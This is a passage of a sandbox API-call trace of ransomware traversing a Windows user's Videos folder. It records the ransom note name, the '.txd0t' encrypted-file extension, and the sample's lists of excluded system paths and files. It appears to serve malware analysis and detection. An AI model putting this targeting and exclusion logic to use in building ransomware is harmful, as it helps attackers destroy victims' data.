(lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch=":\\perflogs\\") returned 0x0 [0119.924] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch=":\\programdata\\") returned 0x0 [0119.924] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch=":\\drivers\\") returned 0x0 [0119.924] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch=":\\wsus\\") returned 0x0 [0119.924] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.924] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.924] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="crypt_detect") returned 0x0 [0119.924] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="cryptolocker") returned 0x0 [0119.924] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="ransomware") returned 0x0 [0119.924] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="C:\\WINDOWS") returned 0x0 [0119.924] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.924] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", lpSrch="C:\\Program Files") returned 0x0 [0119.924] GetProcessHeap () returned 0xe30000 [0119.924] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c6) returned 0xed39f8 [0119.924] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0119.924] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\*", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\*") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\*" [0119.924] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\*", lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b7beff0, ftCreationTime.dwHighDateTime=0x1d5e1a0, ftLastAccessTime.dwLowDateTime=0x530cdabd, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x530cdabd, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1df0 [0119.924] StrCmpW (psz1=".", psz2=".") returned 0 [0119.924] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b7beff0, ftCreationTime.dwHighDateTime=0x1d5e1a0, ftLastAccessTime.dwLowDateTime=0x530cdabd, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x530cdabd, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.925] StrCmpW (psz1="..", psz2=".") returned 1 [0119.925] StrCmpW (psz1="..", psz2="..") returned 0 [0119.925] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52e451c6, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x52e451c6, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52e451c6, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0119.925] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0119.925] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0119.925] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0119.925] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0119.925] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\!TXDOT_READ_ME!.txt" [0119.925] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0119.925] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0119.925] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0119.925] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0119.925] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0119.925] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0119.925] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0119.925] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0119.925] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0119.925] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0119.925] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0119.925] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0119.925] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0119.925] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0119.925] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0119.925] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0119.925] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1aa47cd0, ftCreationTime.dwHighDateTime=0x1d5eda2, ftLastAccessTime.dwLowDateTime=0x4a2710d0, ftLastAccessTime.dwHighDateTime=0x1d5f0c7, ftLastWriteTime.dwLowDateTime=0x52e451c6, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xdce3, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="9t0zT_40.mkv.txd0t", cAlternateFileName="9T0ZT_~1.TXD")) returned 1 [0119.925] StrCmpW (psz1="9t0zT_40.mkv.txd0t", psz2=".") returned 1 [0119.925] StrCmpW (psz1="9t0zT_40.mkv.txd0t", psz2="..") returned 1 [0119.925] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0119.925] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0119.925] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="9t0zT_40.mkv.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\9t0zT_40.mkv.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\9t0zT_40.mkv.txd0t" [0119.925] PathFindExtensionW (pszPath="9t0zT_40.mkv.txd0t") returned=".txd0t" [0119.925] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.925] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a87a300, ftCreationTime.dwHighDateTime=0x1d5ee11, ftLastAccessTime.dwLowDateTime=0x5303514a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5303514a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="a w2nq", cAlternateFileName="AW2NQ~1")) returned 1 [0119.925] StrCmpW (psz1="a w2nq", psz2=".") returned 1 [0119.925] StrCmpW (psz1="a w2nq", psz2="..") returned 1 [0119.926] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0119.926] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0119.926] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="a w2nq", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0119.926] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\windows\\system32\\") returned 0x0 [0119.926] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.926] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\windows\\system\\") returned 0x0 [0119.926] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.926] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.926] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\appdata\\local\\") returned 0x0 [0119.926] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.926] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.926] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.926] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch=":\\boot\\") returned 0x0 [0119.926] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch=":\\perflogs\\") returned 0x0 [0119.926] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch=":\\programdata\\") returned 0x0 [0119.926] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch=":\\drivers\\") returned 0x0 [0119.926] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch=":\\wsus\\") returned 0x0 [0119.926] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.926] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.926] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="crypt_detect") returned 0x0 [0119.926] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="cryptolocker") returned 0x0 [0119.926] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="ransomware") returned 0x0 [0119.926] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="C:\\WINDOWS") returned 0x0 [0119.926] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.926] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", lpSrch="C:\\Program Files") returned 0x0 [0119.926] GetProcessHeap () returned 0xe30000 [0119.926] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4d4) returned 0xed90d0 [0119.926] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0119.926] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\*", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\*") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\*" [0119.926] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\*", lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a87a300, ftCreationTime.dwHighDateTime=0x1d5ee11, ftLastAccessTime.dwLowDateTime=0x5303514a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5303514a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1eb0 [0119.927] StrCmpW (psz1=".", psz2=".") returned 0 [0119.927] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a87a300, ftCreationTime.dwHighDateTime=0x1d5ee11, ftLastAccessTime.dwLowDateTime=0x5303514a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5303514a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.927] StrCmpW (psz1="..", psz2=".") returned 1 [0119.927] StrCmpW (psz1="..", psz2="..") returned 0 [0119.927] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52eb798f, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x52eb798f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52eb798f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0119.927] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0119.927] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0119.927] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0119.927] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0119.927] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\!TXDOT_READ_ME!.txt" [0119.927] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0119.927] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0119.927] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0119.927] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0119.927] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0119.927] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0119.927] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0119.927] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0119.927] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0119.927] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0119.927] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0119.927] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0119.927] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0119.927] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0119.927] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0119.927] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0119.927] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x140c5800, ftCreationTime.dwHighDateTime=0x1d5e444, ftLastAccessTime.dwLowDateTime=0x52e91693, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52e91693, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="0ll0qUCYfiYHKHKER R", cAlternateFileName="0LL0QU~1")) returned 1 [0119.927] StrCmpW (psz1="0ll0qUCYfiYHKHKER R", psz2=".") returned 1 [0119.927] StrCmpW (psz1="0ll0qUCYfiYHKHKER R", psz2="..") returned 1 [0119.927] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0119.927] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0119.927] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="0ll0qUCYfiYHKHKER R", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R" [0119.927] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="\\windows\\system32\\") returned 0x0 [0119.928] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.928] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="\\windows\\system\\") returned 0x0 [0119.928] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.928] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.928] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="\\appdata\\local\\") returned 0x0 [0119.928] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.928] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.928] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.928] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch=":\\boot\\") returned 0x0 [0119.928] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch=":\\perflogs\\") returned 0x0 [0119.928] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch=":\\programdata\\") returned 0x0 [0119.928] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch=":\\drivers\\") returned 0x0 [0119.928] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch=":\\wsus\\") returned 0x0 [0119.928] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.928] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.928] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="crypt_detect") returned 0x0 [0119.928] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="cryptolocker") returned 0x0 [0119.928] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="ransomware") returned 0x0 [0119.928] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="C:\\WINDOWS") returned 0x0 [0119.928] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.928] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", lpSrch="C:\\Program Files") returned 0x0 [0119.928] GetProcessHeap () returned 0xe30000 [0119.928] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4fc) returned 0x680dae8 [0119.928] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R" [0119.928] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", psz2="\\*", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\*") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\*" [0119.928] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\*", lpFindFileData=0x599e630 | out: lpFindFileData=0x599e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x140c5800, ftCreationTime.dwHighDateTime=0x1d5e444, ftLastAccessTime.dwLowDateTime=0x52e91693, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52e91693, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1b70 [0119.928] StrCmpW (psz1=".", psz2=".") returned 0 [0119.928] FindNextFileW (in: hFindFile=0xec1b70, lpFindFileData=0x599e630 | out: lpFindFileData=0x599e630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x140c5800, ftCreationTime.dwHighDateTime=0x1d5e444, ftLastAccessTime.dwLowDateTime=0x52e91693, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52e91693, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.929] StrCmpW (psz1="..", psz2=".") returned 1 [0119.929] StrCmpW (psz1="..", psz2="..") returned 0 [0119.929] FindNextFileW (in: hFindFile=0xec1b70, lpFindFileData=0x599e630 | out: lpFindFileData=0x599e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52e6b586, 